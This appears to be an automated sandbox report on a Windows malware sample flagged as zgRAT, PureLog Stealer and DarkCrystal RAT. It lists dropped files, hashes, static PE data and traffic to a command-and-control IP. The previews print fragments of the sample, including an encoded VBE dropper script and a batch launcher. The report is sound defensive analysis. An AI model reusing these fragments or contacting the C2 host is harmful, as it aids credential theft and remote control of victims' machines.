                                                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                            C:\Windows\System32\SecurityHealthSystray.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.9831454801000206
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6EJ7PtCM7Jt8Bs3FJsdcV4MKe27F7NeF+vqBHeOulajfqXSfbNtm:PPBPc+Vx9MzeQvk4cjRzNt
                                                                                            MD5:0542CB9F2AF7769384BD3C6527E8ED3F
                                                                                            SHA1:F3FC40E45DFE1DF65ED5A00CA8B016CA2818B5F1
                                                                                            SHA-256:FC7CEAE95ED6D460F90E3CA30E004B47D05038429F84DE1C2E7A030AC4AB67C2
                                                                                            SHA-512:18B2B75FC95699CF3DE131531494219811FEBAA4054E8D213FD0AB61B41FA80188912E952EFA4280FA30B62A453A17205CC19D11017A7C2B95AAAB320F1F95AC
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*g.............................'... ...@....@.. ....................................@.................................|'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..T.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.$.......#GUID...4... ...#Blob...........WU........%3................................................................

                                                                                            C:\hyperContaineragent\104cc4390f9b1b

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (597), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):597
                                                                                            Entropy (8bit):5.875007232727717
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Bwm8jx1jaZS6a3I5Aw2CNSAkQd7RtnSV65QnJYJTKlU9EUIHPB7P+j/kZfjnuQG:BbQx1m46aIW99QXtnSVgQCCiIvlo/mHG
                                                                                            MD5:033CBC5BE644E75CC4210A1936066C0F
                                                                                            SHA1:ACD2A5C7D2D0C8833BF87D70E94C6C588FFCA7DD
                                                                                            SHA-256:996E851A841C41F059AE5C68CB8A249DFEC5B63745C9E2CAFDF0593DED38B2DF
                                                                                            SHA-512:76DA00E9426293D0800639F6339D2799D421459034FEB35E2DE599C1C9DB946C845445E5365D2BCDC11D5DDC4BBDE6E5EF9C42B1C06242482210AF7135A4F889
                                                                                            Malicious:false
                                                                                            Preview:5Ud1EDLZgc8GX8yyxkqRxVuygOTEbmVOBRzfOrxS71E3RCVIXgBYHSxjjoU0tG83GuFGITjGxYT5R0he2Lr4l7GseQ5kW6i13Kwg6P9D65kt81RsG07iYDSIoWm2Y9t0zcCHDBinLn7pWWum9Meg9Acz1o2jnHp7Lu3fyJoFSUWuGmwRm93LfN1zANPZI89E8AemdOxzhYOonrsO1l7nOdc72Dfl3P6TUSwGIJxXMDnG9NMSeBhhBWzehgtZtL5Sc4TV5mGrxjbK0V8p1MH2rZS8cSimaYnAIVoE30X15ztb5poMhEhhEClClV2nEdRZ6aCer3vAyP71p1DxnWEW0F5Fuldi7uxbiUeemJeoShtzEtXuSF9sY5i0f6uGaNCEcgTVWiKd1aDTWGAAOsP1uECmvo9qZYNEepXiaBYt5f181PdZ5t1s7KTXdqkrjdEcM9zrscjMUg6PNEufKkuqgfGTVAEubqKbbYv2awqdJoXbODJZ5Eh8tX6r2gVsXzvoVexzS1FY4Rg1HpER0pyXILsDcEA4a7FU3tFuQUHD8IEb1EjMbD2sAYfJvuXN1L76ML8YjUBghvYAHQLXfxcWF

                                                                                            C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):232
                                                                                            Entropy (8bit):5.805230966581105
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GpwqK+NkLzWbHw/JUrFnBaORbM5nCspsqnNkhn3+s:GcMCzWLVhBaORbQCsfNQN
                                                                                            MD5:321B2B59AD9C31CF688937AC999A85AF
                                                                                            SHA1:4E427AAA9F2EF8A56DA4C78BEF071C28DB269C36
                                                                                            SHA-256:5758FD0E39DC256B30ED578041CA918D92A69B9DF7E4AD7808A925619FDE3F85
                                                                                            SHA-512:2E77990658A9602E1DA837FBC4754F7629DF1B6FB6C0A41FB5A1250A924D30FA564C2B3C69C1582D0062244DA480E293EA906D30B4C04CC57016D7B3F3CA30E2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:#@~^zwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFf!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z4Hw.DZKxDCk.+.lT+UOJzZI.1+qfx5JADVZ5%?.\UhqtIiITD-p.ISa (lOJB~Z~~6l^/+oEIAAA==^#~@.

                                                                                            C:\hyperContaineragent\Bridgecommon.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                                            C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):83
                                                                                            Entropy (8bit):5.163842744443543
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:jlWN0AWAIAT0+VAXZAXrNw3QJA9xvbA:QzW/ATxq5gO9JbA
                                                                                            MD5:DF218C1160A79B119167D4DD812857EA
                                                                                            SHA1:E0ADECE134E3AB420A5EB152B98F89F8B15399BB
                                                                                            SHA-256:E5CF111B8B8722E4C2EF307E6DE857530B48EA2C52A18819424BBBEB8F23A0DB
                                                                                            SHA-512:AEAEFBBAEE7DA588E16FF9F6928B001ED9CFCFA60FE54705F5C4705526B010039A92C6DD34DAB4B592E5D24A044525E5E2C3BA4B4ACAC7D07C10F7E4C5488F17
                                                                                            Malicious:false
                                                                                            Preview:%PMdHrshNEIwIs%%kQh%..%qHF%"C:\hyperContaineragent/Bridgecommon.exe"%XTZACTmyNVfJf%

                                                                                            \Device\Null

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\w32tm.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):151
                                                                                            Entropy (8bit):4.858390206609163
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:VLV993J+miJWEoJ8FXI68TLdC8TJ8XKNvofvVXXKvj:Vx993DEUTtTLdlTJodXs
                                                                                            MD5:ADE61FE508677B525C9590B64C63A558
                                                                                            SHA1:99DD2A67E583F209FA203DAB181EF28E5769A8DB
                                                                                            SHA-256:9E9FE7655CE202D2B94A164808DEDE0E2BE66476F17AFD5C4D0829A7294727B0
                                                                                            SHA-512:F3ECB7BB143487738DF6961FD8C716185D05B411DB740452D1CF1693D5C52093C0521ABBBCD2970CE950E267BDF48A3E09EEEE4F8F2AC152B7B61A7282C9FC99
                                                                                            Malicious:false
                                                                                            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 05/11/2024 19:52:16..19:52:16, error: 0x80072746.19:52:21, error: 0x80072746.

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.3994346134560915
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:3AAyq819Vy.exe
                                                                                            File size:2'041'114 bytes
                                                                                            MD5:059dd6a8cb2d31871bb82dbb158965fa
                                                                                            SHA1:10507debf7b1a88791b65fc08a5b995f9b873aee
                                                                                            SHA256:3d92f050fc88966bd639d315d04fa9fb686ba5f61b2ac81c1e47449125a5a9cb
                                                                                            SHA512:3a9e138d8682f6e22ddcdd480da8cd6893d86cf1e48b7e4232c1cd87a9abe2a3e29577201ace85cf551739c33855352c081c85a2992eb60c2947a1524634580e
                                                                                            SSDEEP:24576:2TbBv5rUyXVfKEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6c:IBJfp1JAz5cjb6k4cFdaNjTXfa/h
                                                                                            TLSH:B5959D0675E28E73C2B01A318566463E92E1D6613661FB1F365F2497AC0B7E08F736B3
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                            File Icon

                                                                                            Icon Hash:1515d4d4442f2d2d

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x41f530
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            call 00007F538CDE32EBh
                                                                                            jmp 00007F538CDE2BFDh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            push dword ptr [ebp+08h]
                                                                                            mov esi, ecx
                                                                                            call 00007F538CDD5A47h
                                                                                            mov dword ptr [esi], 004356D0h
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                            mov eax, ecx
                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                            mov dword ptr [ecx+04h], 004356D8h
                                                                                            mov dword ptr [ecx], 004356D0h
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            mov esi, ecx
                                                                                            lea eax, dword ptr [esi+04h]
                                                                                            mov dword ptr [esi], 004356B8h
                                                                                            push eax
                                                                                            call 00007F538CDE608Fh
                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                            pop ecx
                                                                                            je 00007F538CDE2D8Ch
                                                                                            push 0000000Ch
                                                                                            push esi
                                                                                            call 00007F538CDE2349h
                                                                                            pop ecx
                                                                                            pop ecx
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007F538CDD59C2h
                                                                                            push 0043BEF0h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007F538CDE5B49h
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007F538CDE2D08h
                                                                                            push 0043C0F4h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007F538CDE5B2Ch
                                                                                            int3
                                                                                            jmp 00007F538CDE75C7h
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push 00422900h
                                                                                            push dword ptr fs:[00000000h]

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                            PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                            RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                            RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                            RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                            RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                            RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                            RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                            RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                            RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                            RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                            RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                            RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                            RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                            RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                            RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                            RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                            RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                            RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                            RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                            RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                            RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                            RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                            RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                            RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                            RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                            RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-05T23:52:18.200573+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449730TCP
                                                                                            2024-11-05T23:52:32.430448+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973637.44.238.25080TCP
                                                                                            2024-11-05T23:52:57.106277+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449767TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 5, 2024 23:52:31.529380083 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:31.534300089 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:31.535262108 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:31.535790920 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:31.540630102 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:31.884418964 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:31.890763044 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.337801933 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.430362940 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.430389881 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.430448055 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:32.465353966 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:32.470932961 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.696547985 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.702004910 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:32.706984043 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.959577084 CET4973780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:32.964602947 CET804973737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:32.964678049 CET4973780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:32.964920044 CET4973780192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:32.969794989 CET804973737.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.009985924 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.145682096 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.146513939 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.150949001 CET804973637.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.151027918 CET4973680192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.151464939 CET804973837.44.238.250192.168.2.4
                                                                                            Nov 5, 2024 23:52:33.151535988 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.151738882 CET4973880192.168.2.437.44.238.250
                                                                                            Nov 5, 2024 23:52:33.156641006 CET804973837.44.238.250192.168.2.4
